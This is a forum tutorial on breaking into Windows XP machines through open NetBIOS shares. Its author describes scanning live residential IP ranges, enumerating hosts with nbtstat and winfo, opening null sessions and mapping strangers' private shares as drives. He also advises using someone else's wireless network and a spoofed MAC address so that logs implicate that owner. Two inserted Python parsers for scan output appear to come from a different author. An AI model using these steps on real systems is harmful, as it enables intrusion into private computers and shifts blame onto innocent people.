TheTAZZone - Internet Chaos

Quick and Simple NetBIOS exploitation with Windows XP

ORIGINALLY POSTED BY NOKIA FOR THETAZZONE/TAZFORUM HERE

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within its Network

[quote]This tutorial describes a methodology and process for compromising the security on a remote system, which is both illegal and morally questionable. The TAZ Zone cannot take any responsibility for your use or misuse of this tutorial. It has been presented here because we at the TAZ Zone believe in the philosophy of full disclosure. Should you choose to use these methods against a computer, network, or system on which you do not have legal authority to do so, you will not only very likely be violating laws in your country of residence, but also undertaking an ethically objectionable project.


Under no circumstances does the The TAZ Zone condone the unauthorized use of exploits.[/quote]

[size=150][u][b]Quick and Simple – NetBIOS hacking with Windows XP…by Nokia[/b][/u][/size]

Before you read any of this paper, please let me point out the following: (other than the fact I originally wrote it in 1999)

When I performed the following exploit, I used someone else's wireless connection, with a spoofed MAC address, using a Live CD. I did this so any logs on the target machine would lead back to the owner of the wireless AP I used, and from there nothing would lead back to me. If it did somehow lead back to me, as I had used a Live CD there would not be a trace of it on my computer.

I have explained how I did this for a reason. That reason is, if you cannot meet all of the above as a minimum personal protective measure but still carry out the routines mentioned in this paper, you could very well be leaving yourself wide open to any official action that may be taken against you, as you WILL leave log entries on the target host if you connect to it in the described manner.

I will warn all readers now that this paper uses real live IP addresses over the internet. If you do not agree with this, please stop reading now. If you do not agree with it but still read, and therefore learn the methods used in the paper, do not post complaining about the fact that real IPs have been used. Thank you.

However, just because real IPs have been used does not mean that by the time you come to read this the same people will have the same IP addresses, so please don't post saying 'you have followed all the steps and still can't connect to the host'….. as the IP may have changed!

NetBIOS is probably the biggest hole in any Windows computer, when it is not secured properly. You would be very surprised how easy it is for anyone to connect to a PC that is on the internet via its NetBIOS shares.

[b]A definition of NetBIOS is:[/b]

“Short for Network Basic Input Output System, an API that augments the DOS BIOS by adding special functions for local-area networks (LANs). Almost all Windows-based LANs for PCs are based on the NetBIOS. Some LAN manufacturers have even extended it, adding additional network capabilities.”

[b]How does NetBIOS work?[/b]

NetBIOS can be broken down in to three separate uses:

1) Name service for name registration and resolution
2) Session service for connection-oriented communication
3) Datagram distribution service for connectionless communication

For the NetBIOS application to work properly, every host that is using it must have a unique NetBIOS name.

What most people and tutorials on NetBIOS fail to understand and mention is that when accessing NetBIOS in the manner we will use in this paper, we are using NBT (NetBT). This is defined as NetBIOS over TCP/IP and differs from the original NetBIOS specification. The original NetBIOS specification was designed for a very small group of computers to communicate with each other, and certainly for no more than 12 in a group. NBT allows computers to use the NetBIOS API on a far bigger scale and to communicate with each other from far away and over the internet. Another common mistake people make is to say that NetBIOS uses port 139; it is in fact NBT that uses port 139, and it is NBT that we shall be exploiting later on in this paper.

Enter NetBEUI. NetBEUI is the actual protocol that NetBIOS services use and is quite commonly confused with being a different type of NetBIOS. Think of NetBIOS as the actual program/service and NetBEUI as the protocol the program uses to work. With the introduction of NBT, however, NetBEUI is being seen less and less on today's LANs because it does not support any routing protocols.

Due to all the different protocols and services that use NetBIOS, it has become the general consensus to group it all together and just call it NetBIOS. For most people this is good enough, but if you are reading this you want to exploit it, and to do that you need to know that little bit more than the normal user!

Most people (usually Linux lovers) are very quick to jump on the NetBIOS bandwagon by saying it is insecure, should not be used, is a bad design, a major weakness, etc.
Whilst all of the above are probably true if it is incorrectly configured, certain conditions have to be met to make it as bad as that. NetBIOS has to meet the following conditions to be exploited [i]easily[/i]:

1. File and Printer Sharing for Microsoft Networks is installed as a network component (Network in Control Panel).
2. File and Printer Sharing for Microsoft Networks is bound to TCP/IP on an adapter used for the Internet.
3. Options for files and printers are checked (enabled) under File and Print Sharing.
4. “Share(s)” have actually been configured for file(s) and printer(s).
5. Strong passwords have not been used on file and printer “share(s).”
6. Scope ID has not been set like a strong password.

Windows PCs ship with default shares such as SharedDocs. Some of these shares have a $ after them, such as C$, PRINT$, ADMIN$ and IPC$. The $ tells us they are hidden shares, and NT and XP have these by default. There are a lot of hosts out there that make life easy for us by not password protecting their shares; for those that are password protected we can sometimes create a "null" session by using the "" /U:"" switch at the end of our command. A null session gives us the lowest possible functionality, but it does give us a place to start.

You should now have a very basic and broad understanding of what NetBIOS is – there is a lot more to it than this and I have simplified certain parts of it, as this paper is about exploiting NetBIOS not detailing how it works.

It would be beneficial to you to learn the ins and outs of NetBIOS, and this web site is the best one I have found for NetBIOS information:
http://www.signaltonoise.net/library/netbios.htm
Or if you want to get really technical, the RFC 1001 for NetBIOS is here:
http://www.networksorcery.com/enp/rfc/rfc1001.txt

[b]Exploiting it:[/b]

Windows uses ports 139 and 445 when sharing files between hosts and servers with the NBT service. Usually some form of authentication is required for external hosts to access the shares available on it. However, more often than not PCs are configured to allow unrestricted access to all their shares, and even if we can't get access to the shares there is still a whole host of other valuable information we can collect from these open ports.

[b]So how do we do it?[/b]

Step one is to download Nmap, or a port scanner that you are familiar with. With the release of the Windows executable of Nmap there is now no reason you can't install it on a Windows box.

You can find the Download page here:
http://www.insecure.org/nmap/download.html

After you have downloaded Nmap go and get winfo from here:
http://ntsecurity.nu/toolbox/winfo/

When you have this browse to C:\WINDOWS\system32 and drop the winfo file there. Or you can manually edit your path for the command prompt to include the location of the winfo file.

Now that we have nmap, we want it to scan a range of IPs, but as we are trying to gain access to NetBIOS shares we only need to scan ports 139 and 445. So we issue the following command:

[code]nmap -sS -P0 81.32.12.0-255 -p 139,445[/code]

Here we have told nmap to conduct a SYN Stealth scan, without pinging the hosts, against the IP range of 81.32.12.0 – 81.32.12.255 only on ports 139 & 445.

Here are the results of the scan:

[code]Interesting ports on 81.32.12.204:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.205:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 206.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.207:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.208:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.209:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 210.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 211.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.212:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.213:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 214.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 215.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 216.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 217.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 218.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.219:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 220.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 221.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 222.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 223.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.224:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.225:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 226.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.227:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.228:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 229.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 230.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 231.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 232.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 233.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 234.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.235:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.236:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.237:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.238:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 239.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 240.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 241.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.242:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 243.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 244.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 245.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 246.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 247.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.248:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 249.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 250.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 251.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 252.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 253.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.254:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.255:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds

Nmap finished: 256 IP addresses (256 hosts up) …..[/code]

OK, now looking at the output of the scan, there are three states a port can be in: Closed, Filtered or Open.

Closed speaks for itself. Filtered usually means the port is open/active but is protected by a firewall of some kind that blocks the probe. Open means it is open and unprotected.

So we trawl through the results and find that 81.32.12.240 has port 139 open…

So we will go and take a look at it.

[i]Just a side note: we scanned for port 445 too, as it is possible to have port 139 open but not have the file sharing service running. If port 445 is open as well as 139 it usually means that the file sharing service is up and running, which could save us some time when choosing which host to attack.[/i]
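As an added example (not from Nokia's original paper), this Python snippet parses nmap's normal output for a 139/445 scan like the one above into per-host port states and applies the paper's own triage rules: open, filtered or closed per port, plus the side note's heuristic that 139 and 445 both open suggests the file sharing service is actually running. The scan text is constructed with 192.0.2.0/24 (RFC 5737) addresses, and the parser also accepts the newer "Nmap scan report for" host header, which the older nmap on this page does not print.

```python
import re

# Host header line. Older nmap prints "Interesting ports on X:" (as on this
# page); newer versions print "Nmap scan report for X". Both are accepted.
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for)\s+(.+?):?\s*$")
# One port line from a TCP scan, e.g. "139/tcp open netbios-ssn".
PORT_RE = re.compile(r"^(\d+)/tcp\s+(open|filtered|closed)\s+\S+")

# Constructed sample scan output (192.0.2.0/24 is the RFC 5737 documentation range).
SAMPLE_SCAN = """\
Interesting ports on 192.0.2.204:
PORT    STATE    SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 192.0.2.205:
PORT    STATE    SERVICE
139/tcp closed   netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 192.0.2.240:
PORT    STATE    SERVICE
139/tcp open     netbios-ssn
445/tcp filtered microsoft-ds

Nmap scan report for 192.0.2.241
PORT    STATE    SERVICE
139/tcp open     netbios-ssn
445/tcp open     microsoft-ds

Nmap finished: 4 IP addresses (4 hosts up) scanned in 3.210 seconds
"""


def parse_nmap(text):
    """Return {host: {port: state}} for every host block in nmap normal output."""
    results = {}
    host = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            results[host] = {}
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            results[host][int(m.group(1))] = m.group(2)
    return results


def classify(ports):
    """Apply the paper's reading of the three port states to 139 and 445.

    A port nmap did not report at all is treated as closed.
    """
    s139 = ports.get(139, "closed")
    s445 = ports.get(445, "closed")
    if s139 == "open" and s445 == "open":
        return "likely-sharing"  # side note: both open, file sharing probably running
    if s139 == "open":
        return "nbt-open"        # NBT session port reachable, file sharing not confirmed
    if s445 == "open":
        return "smb-open"        # SMB directly over TCP reachable
    if "filtered" in (s139, s445):
        return "filtered"        # a firewall is in the way, nmap cannot tell more
    return "closed"


def triage(text):
    """Classify every host in the scan; returns {host: verdict}."""
    return {host: classify(ports) for host, ports in parse_nmap(text).items()}


def exposed_hosts(text):
    """Hosts answering on 139 or 445 at all: the ones a defender should look at first."""
    exposed = ("likely-sharing", "nbt-open", "smb-open")
    return sorted(h for h, verdict in triage(text).items() if verdict in exposed)


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_SCAN).items():
        print(f"{host:<16} {verdict}")
```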

Fire up the command prompt again and use the built-in NBTSTAT utility that comes with Windows. The command we give is:
[code]nbtstat -a [ip address][/code]

Like so:

[code]H:\>nbtstat -a 81.32.12.240

Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
MASSAMA <00> UNIQUE Registered
MASSAMA <20> UNIQUE Registered
GRUPO_TRABAJO <00> GROUP Registered
GRUPO_TRABAJO <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00[/code]

So what is all this telling us?

Well, what we are mainly looking at is the 'Type' status: we want to see <20> there. A common misconception is that if you can connect to a box in the above-mentioned manner, file sharing is enabled. This is not always the case. When we have connected we need to see the <20> there to tell us File Sharing is enabled; if it is not there, and you are at a level that means you are reading this, you may as well move on to another box.

The following table lists all the possible entries you can get (Type: U = unique name, G = group name):

[code]Suffix  Type  Service
00      U     Workstation Service
01      U     Messenger Service
01      G     Master Browser (name <.._MSBROWSE_>)
03      U     Messenger Service
06      U     RAS Server Service
1F      U     NetDDE Service
20      U     File Server Service
21      U     RAS Client Service
22      U     Exchange Interchange
23      U     Exchange Store
24      U     Exchange Directory
30      U     Modem Sharing Server Service
31      U     Modem Sharing Client Service
43      U     SMS Client Remote Control
44      U     SMS Admin Remote Control Tool
45      U     SMS Client Remote Chat
46      U     SMS Client Remote Transfer
4C      U     DEC Pathworks TCP/IP Service
52      U     DEC Pathworks TCP/IP Service
87      U     Exchange MTA
6A      U     Exchange IMC
BE      U     Network Monitor Agent
BF      U     Network Monitor Application
03      U     Messenger Service
00      G     Domain Name
1B      U     Domain Master Browser
1C      G     Domain Controllers
1D      U     Master Browser
1E      G     Browser Service Elections
1C      G     Internet Information Server
00      U     Internet Information Server[/code]

As you can see there are many different services that we can connect to. The scope of this paper is File Sharing though, so we will just concentrate on the <20> field.
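As an added example (not part of Nokia's original paper), here is a small Python parser for the name table that nbtstat -a prints. It uses the suffix codes from the table above to name each registered service and answers the one question the text cares about: is a registered <20> File Server Service present? Both sample tables are constructed (RFC 5737 addresses and IANA documentation MACs); the second one shows the case the text warns about, a host that answers nbtstat but advertises no <20>.

```python
import re
from typing import NamedTuple

# Suffix table as listed on this page, keyed by (hex suffix, U for UNIQUE / G for GROUP).
# Where the page lists two meanings for one code (00/U, 03/U, 1C/G), the first is kept.
SUFFIXES = {
    ("00", "U"): "Workstation Service",
    ("01", "U"): "Messenger Service",
    ("01", "G"): "Master Browser",
    ("03", "U"): "Messenger Service",
    ("06", "U"): "RAS Server Service",
    ("1F", "U"): "NetDDE Service",
    ("20", "U"): "File Server Service",
    ("21", "U"): "RAS Client Service",
    ("00", "G"): "Domain Name",
    ("1B", "U"): "Domain Master Browser",
    ("1C", "G"): "Domain Controllers",
    ("1D", "U"): "Master Browser",
    ("1E", "G"): "Browser Service Elections",
    ("BE", "U"): "Network Monitor Agent",
    ("BF", "U"): "Network Monitor Application",
}


class NameEntry(NamedTuple):
    name: str
    suffix: str   # two hex digits, e.g. "20"
    kind: str     # "UNIQUE" or "GROUP"
    status: str   # e.g. "Registered"
    service: str  # looked up from SUFFIXES, or "unknown"


# One table row:  NAME <XX> UNIQUE|GROUP Status
ROW_RE = re.compile(r"^\s*(\S.*?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# Constructed sample: a host advertising the <20> File Server Service.
SAMPLE_WITH_SHARING = """\
Local Area Connection:
Node IpAddress: [192.0.2.10] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    FILESRV01      <00>  UNIQUE      Registered
    FILESRV01      <20>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    WORKGROUP      <1E>  GROUP       Registered

    MAC Address = 00-00-5E-00-53-01
"""

# Constructed sample: two adapters (first finds nothing), name table present but no <20>.
SAMPLE_NO_SHARING = """\
Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.0.2.11] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    LAPTOP07       <00>  UNIQUE      Registered
    LAPTOP07       <03>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered

    MAC Address = 00-00-5E-00-53-02
"""


def parse_nbtstat(text):
    """Return (entries, mac) from captured nbtstat -a output; mac is None if absent."""
    entries = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # headers, separator, "Host not found." and blank lines
        name, suffix, kind, status = m.groups()
        suffix = suffix.upper()
        service = SUFFIXES.get((suffix, kind[0]), "unknown")
        entries.append(NameEntry(name, suffix, kind, status, service))
    m = MAC_RE.search(text)
    return entries, (m.group(1) if m else None)


def file_sharing_advertised(entries):
    """True only when a registered UNIQUE <20> name (File Server Service) is present."""
    return any(e.suffix == "20" and e.kind == "UNIQUE" and e.status == "Registered"
               for e in entries)


def summarize(text):
    """Condense one nbtstat run into the facts the text reads off the table."""
    entries, mac = parse_nbtstat(text)
    return {
        "hosts": sorted({e.name for e in entries if e.kind == "UNIQUE"}),
        "groups": sorted({e.name for e in entries if e.kind == "GROUP"}),
        "mac": mac,
        "file_sharing": file_sharing_advertised(entries),
        "services": [(e.name, e.suffix, e.service) for e in entries],
    }
```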

So, having discovered that we can 'nbtstat' another box and established that the File Sharing Service is running, we want to see what shares are available on it.

For this we again use an inbuilt Windows command: the 'net' command, or more specifically the 'net view' command.

[code]H:\>net view \\81.32.12.240
System error 5 has occurred.

Access is denied.[/code]

Whoops. OK, so this guy is not as open as he first appeared and we can't get a list of his shares. This may be because he is not running any shares, or because he has locked down his box and prevented it from displaying his shares to the casual internet user.

I have put this in to this paper for a few reasons. The first being, if you scour the internet looking for NetBIOS tutorials, you will find hundreds that have been written and performed on an internal LAN which is conveniently set up to allow anonymous access to the File Sharing service. This paper is using live IP addresses in real-life scenarios on the real internet, not a pre-constructed LAN…..hence you won't always be successful first time!

Another reason I left it in is to show that just because you can see the NetBIOS table and it has the <20> File Sharing service running, does not mean you can connect to it!

The final reason is to demonstrate that you will not always be successful with this attack and it can take a lot of trial and error. I have given lessons in the past that have gone on for in excess of 60 minutes before we have found an open and suitable host.

There are ways to gain access to secured shares but that is in the scope of the Advanced NetBIOS paper which will follow this one.

Right, so the last command would not let us get a list of the shares available…..but that does not mean there aren’t any. We can try to connect to the most obvious ones anyway and see what happens.

We stick with the inbuilt ‘net’ command only this time we use the ‘net use’ command.

[code]H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.

Enter the user name for '81.32.12.240': administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.

Logon failure: unknown user name or bad password.[/code]

OK we don’t know the password…..there are heaps of password crackers for NetBIOS out there – which I consider to be more advanced so will be included in the next paper.

We do have the option of connecting via a ‘null’ session however. A null session does not require a user name or password and will usually allow a connection attempt.
To signify a null connection attempt we use the "" /U:"" switch at the end of our command.

Try the following:

[code]H:\>net use \\81.32.12.240\ipc$ "" /U:""
The command completed successfully.[/code]

Now try the 'net view' command again to see if we can get a list of the shares. This may or may not be successful, but more often than not it will fail. (If you are successful, read on further down the page to find what to do next!)

Right, so for the scope of our paper the above target will be considered ‘secure’ and we move on to easier pickings……..back to nmap!

I find it easier to either use the -oN switch (which writes nmap's normal output to a file) or to right click the top of the command prompt window and go to Properties. Once here, increase the buffer size to enable you to scroll upwards in the command prompt; otherwise you may not be able to view the entire output.

The best results for this type of crack are usually found in a residential subnet of IP addresses. How do you find one of those? If you’re at home chances are you are in a residential subnet! Take a look at your own IP and use that. When I ran this scan my IP was in the 86.132.223.x range so I scanned that.

[code]nmap -sS -P0 -v 86.132.223.0-255 -p 139,445[/code]

The results for open ports came back as:

[code]Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227[/code]

OK, so now we have a whole host of my neighbours to connect to!

Let's choose an IP!

Hmmmmmm 86.132.223.178 I think!

So open up a command prompt and type:

[code]H:\>nbtstat -a 86.132.223.178

Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
OFFICE <00> UNIQUE Registered
MSHOME <00> GROUP Registered
OFFICE <20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00[/code]

Ok so we now have the NetBIOS table and the MAC address. We take a look to see if the File Sharing Service is active (<20>). Yep it is.

So, now as we know, we issue the net view command to get a list of the shares….

[code]H:\>net view 86.132.223.178
Shared resources at 86.132.223.178

OFFICE

Share name Type Used as Comment

——————————————————————————-
bramford photos Disk
BrotherD Print Brother DCP-340CW USB Printer
BrotherD.2 Print BRN_759F2E
johns Disk
PaperPor Print PaperPort Black & White Image
PaperPor.2 Print PaperPort Color Image
Printer Print Imprimante Fax Olitec
Printer4 Print ProgeSOFT PDF Wizard
Printer7 Print Net-It Now! SE for Pressworks
Printer9 Print EPSON PictureMate
SharedDocs Disk
SLAVE (D) Disk
The command completed successfully.[/code]

Holy Shit! Look at all those shares.

Now open up a new command prompt and give the following command:

[code]H:\>winfo 86.132.223.178 -v

Winfo 2.0 – copyright (c) 1999-2003, Arne Vidstrom
– http://www.ntsecurity.nu/toolbox/winfo/

SYSTEM INFORMATION:

– OS version: 5.1

DOMAIN INFORMATION:

– Primary domain (legacy): MSHOME
– Account domain: OFFICE
– Primary domain: MSHOME
– DNS name for primary domain:
– Forest DNS name for primary domain:

PASSWORD POLICY:

Warning: Unable to retrieve password policy.
Reason : Access denied.

LOCOUT POLICY:

Warning: Unable to retrieve lockout policy.
Reason : Access denied.

SESSIONS:

Warning: Unable to retrieve sessions.
Reason : Access denied.

LOGGED IN USERS:

* OFFICE$

* vernon cooper

USER ACCOUNTS:

Warning: Unable to enumerate users.
Reason : Access denied.

WORKSTATION TRUST ACCOUNTS:

Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.

INTERDOMAIN TRUST ACCOUNTS:

Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.

SERVER TRUST ACCOUNTS:

Warning: Unable to enumerate server trust accounts.
Reason : Access denied.

SHARES:

* IPC$

– Type: Unknown
– Remark: Remote IPC

* print$

– Type: Disk drive
– Remark: Printer Drivers

* SharedDocs

– Type: Disk drive
– Remark:

* johns

– Type: Disk drive
– Remark:

* PaperPor.2

– Type: Print queue
– Remark: PaperPort Color Image

* Printer7

– Type: Print queue
– Remark: Net-It Now! SE for Pressworks

* SLAVE (D)

– Type: Disk drive
– Remark:

* Printer4

– Type: Print queue
– Remark: ProgeSOFT PDF Wizard

* PaperPor

– Type: Print queue
– Remark: PaperPort Black & White Image

* BrotherD.2

– Type: Print queue
– Remark: BRN_759F2E

* bramford photos

– Type: Disk drive
– Remark:

* Printer9

– Type: Print queue
– Remark: EPSON PictureMate

* Printer

– Type: Print queue
– Remark: Imprimante Fax Olitec

* BrotherD

– Type: Print queue
– Remark: Brother DCP-340CW USB Printer[/code]

As you can see, winfo gives us all the shares in an easier-to-read layout. You can put -n at the end of the winfo command to establish a null session if issuing the command without it does not work.

Ok let’s pick a share….mmmm…johns looks good.

Let me explain the following command briefly first though.

"net use" means we are going to use a network resource.
The "*" means use the next available drive letter. We normally have C for the hard drive, D for the next logical partition or next hard drive, E for a CD-ROM and maybe even F for another CD-ROM/DVD-ROM, etc. Using the * just tells Windows to use the next available letter, starting from Z and working backwards. We can specify our own letter if we want to, but the outcome is the same.

[code]H:\>net use * \\86.132.223.178\johns
Drive Z: is now connected to \\86.132.223.178\johns.

The command completed successfully.[/code]

Ok, so John has a share on this computer that is open to the whole world and is not password protected.

How do we see what information is available to us?

Simply go to 'My Computer' and you will have a Z drive there, already connected and mapped for you! Click on it and you get to see what is in John's share.

Let’s try another Share:

[code]H:\>net use * \\86.132.223.178\SharedDocs
Drive Y: is now connected to \\86.132.223.178\SharedDocs.

The command completed successfully.[/code]

So go back to My Computer and you will now see the Y: drive connected and mapped out for you.

The other and easier way to do this, is to now go to Start > Search > Computers and add the IP Address in. You will now get a nice graphical view of all the shares.

So we can view all the shares here……..but that soon gets boring…what else can we do?

Well, if we go to My Computer and right click on the share, then go to properties.
What we are interested in here is the shares and the groups available to us and we can also get to see if it is on an AD domain.
So go to Security and take a look at the shares/groups. It should become apparent now if it is on an AD domain or not.
Would it be worth seeing what rights/privileges John has, since we are on his share…….it would probably be a good idea!

So we go to Security > Advanced > Here we can see a detailed list of all the groups and permissions…..but we want more than that…. So we go to the ‘Effective Permissions tab’ and click on Select.

We now get a box allowing us to select a user name. We already know his first name is John……..what are the odds that if we go trawling through all the letters and stuff available to us in his share, we could probably find his surname pretty quickly……..
Then we enter his first name, a ‘.’ and then his surname. Usernames on an AD are usually a first name and a surname separated by a dot. If it doesn’t work, experiment with different methods of user name!
If you manage to find his log on name – you will be able to view all his current permissions.
But don’t forget the winfo output…which listed the users who are currently logged on……..

So, we have seen who it is, done the manual way, which for me is the more enjoyable and skilful way.

Now let's do it the skiddie way.

Go and download Essential Net Tools from http://www.tamos.com/ you should be able to get a free 30 day trial of it.

Install it and crank it up.

Now go to NBscan and enter our IP address in to it and it will display pretty much the same information that the command prompt did but in a more graphical manner. Right click on the computer at the top of the window and select Open Computer.

This just opens the same window we got when we went to Search > Computers. Right clicking it also gives us a few more options, such as Add to LMHOSTS.
If we add this we can connect to it in the same manner we would any other box on the LAN. I’m not going to explain what the LMHOSTS file is as most people will know but if you don’t you can go here to read about it should you wish:
http://support.microsoft.com/?kbid=150800

